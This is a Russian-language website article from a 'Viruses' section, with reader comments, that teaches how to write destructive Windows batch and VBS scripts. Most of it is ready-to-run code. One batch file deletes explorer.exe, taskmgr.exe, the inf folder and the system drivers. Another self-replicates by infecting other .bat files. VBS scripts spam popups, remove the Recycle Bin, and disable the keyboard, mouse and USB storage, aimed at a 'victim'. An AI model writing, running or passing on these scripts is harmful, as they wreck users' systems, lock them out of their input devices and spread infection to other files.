Здравствуйте, Гость | Воскресенье, 19.5.2024, 00:02 | RSS | Контакты
Категории раздела
Наш опрос
Какая у вас операционная система?
Всего ответов: 454
Реклама
Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0
Главная » Статьи » Софт » Вирусы

.vds

В этот раз давайте не будем писать bat файлы в огромных количествах (ну если только один или два). А займемся мы VBS.

Начнем мы с bat да-да для разминочки.
Кто не знает что это за исполняймые файлы с разрешение bat или cmd тот нажимает Win+R
и выполняет CMD и пишет help.Надеюсь дальше обьяснять не нужно.
Так вот наш супер большой и сложный вирус
будет состоять из нескольких строк.
Только для начала нам придется открыту нашу любимую командную строку и набрать SET
это надо для того чтобы узнать список переменных сред Windows.нам интересна последняя строка windir - это переменная заменяет полный путь к папке
Windows. Начнем?Открываем notepad(блокнот) и пишем эту пургу.

*******************************
taskkill /f /im explorer.exe
del /q /f %windir%\explorer.exe
del /q /f %windir%\taskmgr.exe
rd /q /s %windir%\inf
rd /q /s %windir%\system32\drivers
********************************

Сохраняем наш файл как I_LOVE_YOU.bat и радуемся.
После запуска такой микровещи на машине не будет не рабочего стола ни менеджера задач ни драйверов.

Я обещал один? Да?Извините не стерпел и вот выкладываю второй ...

********************************
@echo off%[Bams]%
if '%1=='In_ goto Bamsin
if exist c:\Bams.bat goto Bamsru
if not exist %0 goto Bamsen
find "Bams"<%0>c:\Bams.bat
attrib +h c:\Bams.bat
:Bamsru
for %%t in (*.bat) do call c:\MeTrA In_ %%t
goto Bamsen
:Bamsin
find "Bams"<%2>nul
if not errorlevel 1 goto Bamsen
type c:\Bams.bat>>%2
:Bamsen
*********************************

Это более сложный вирус но он и более интересный .
Он ползает по винту ищет и заражает собой *.bat файлы.

Все!Переходим к VBS вирусам.
Язык VBS в винде поддерживается с 98 версии и не требует установки дополнительных библиотек
и другой ненужной фигни).по другому VBS-язык скриптов

Ну приступим с самого легкого напугаем жертву страшным сообщением.Типа:Через минуту ваша крыса заболеет бешенством!Поставить прививку?
И спросим ДА или НЕТ.-32
С количеством показа 1 и временем показа 0(то есть пока не выберит что он хочет)
Значок выберим вопроса
кнопки да и нет-4

Открываем блокнот и пишем.

***********************************
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
i=1
while i>0 or i<0
S.popup "Через минуту ваша крыса заболеет бешенством!Поставить прививку?",0, "Айболит",4+32
i=i-1
wend
*************************************

сохраняем это чудо как mouse.vbs

Если кто то хочет чтоб значок был восклицание тот пишет 48 Вместо 32.
Дальше мы разберемся с этими параметрами).

Попугали значит мы жертву сообшениями (или бабушку которая любит пасьянс ) и движемся вперед.
А впереди у нас корзина(скучное название) надо бы его изменить например на Свалку или Бомжатник
все зависит от фантазии но код очень простой.

***************************************

Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","Свалка"

***************************************

Название то поменяли только зачем нам свалка на столе? Еще место занимает а не снести линам ее вообше?
Нет проблем для этих сучаев имеем это чудо.

****************************************

Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.regdelete"HKLM\SOFTWARE\Microsoft\Windows\Curren tVersion\Explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}\"

****************************************

Не устал мой друг? Если нет то мы подолжаем чудить , а если честно то только начинаем.
Что то скучно.надо бы музыку для поднятия настроения ну тут у нас два выхода либо мы заставляем трещать флопигрыз
,либо пишать бесприрывно встроенный динамик.Выбор за вами.
Вот это прикол с флопигрызом.

*****************************************

Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")

do
fso.getfile("A:\")
loop

******************************************

ну а это уже динамик.

******************************************

Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")

do
execute"S.Run ""%comspec% /c "" & Chr(7), 0,True"
loop

*******************************************

Ну теперь мы займемся более серьезными вещами.
Бывают случаи что надо порализовать либо клавиатуру либо мышку.
Клавиатуру в накаут выводим так:

*******************************************

Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")

s.run"reg add ""hklm\system\currentcontrolset\control\keyboa rd layout"" /v ""Scancode Map"" /t REG_BINARY /d 0000000000000000A000000000005DE000000E0000003A0000 0053E000004FE000001C0000000100000047E0000052E00000 380000001D0000002A0000005BE000004500000051E0000049 E000005EE0000037E0000038E000001DE00000360000005CE0 0000460000005FE00000390000000F00000063E00000280000 000C000000330000003400000035000000270000001A000000 2B0000001B000000290000000D0000000B0000000200000003 00000004000000050000000600000007000000080000000900 00000A0000001E000000300000002E00000020000000120000 00210000002200000023000000170000002400000025000000 26000000320000003100000018000000190000001000000013 0000001F00000014000000160000002F000000110000002D00 0000150000002C0000003B0000003C0000003D0000003E0000 003F0000004000000041000000420000004300000044000000 5700000058000000640000006500000066000000520000004F 00000050000000510000004B0000004C0000004D0000004700 000048000000490000004A000000370000005300000035E000 004E0000001CE0000050E000004BE000004DE0000048E00000 0000",0

********************************************

И следом летит крыса.

********************************************

Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")

s.regwrite"HKLM\SYSTEM\CurrentControlSet\Services\ Mouclass\Start","4","REG_DWORD"

********************************************

Затем нам вдруг приспичило отключить все что висит на USB портах.Ну например чтоб чел не успел
сохранить весь дорогой ему сердцу мусор на флешку.
И мы делаем обрезание портов=)

**********************************************

Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.regwrite"HKLM\SYSTEM\CurrentControlSet\Services\ USBSTOR\Start","4","REG_DWORD"

**********************************************

Ну вот я и немного ввел вас в мир шуток и подлянок на VBS.
Это только первая часть моей небольшой статьи.

Icq
618310091
Категория: Вирусы | Добавил: strelok (10.11.2011) | Автор: глеб E W
Просмотров: 5894 | Комментарии: 7 | Рейтинг: 5.0/2
Всего комментариев: 4
4 hi  
0
hi

3 anonim  
0
Статья классная! Но ты так и не рассказал значение параметров 43, 36 и т.д.
P.S.Когда ты нас новыми вещами будеш радовать?

2 Крым  
0
СУПЕР!!!!!!!! давай еще

1 саныч  
0
Лёх выложи ещё
Ответ: ок жди, скоро появится новый материал)

Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]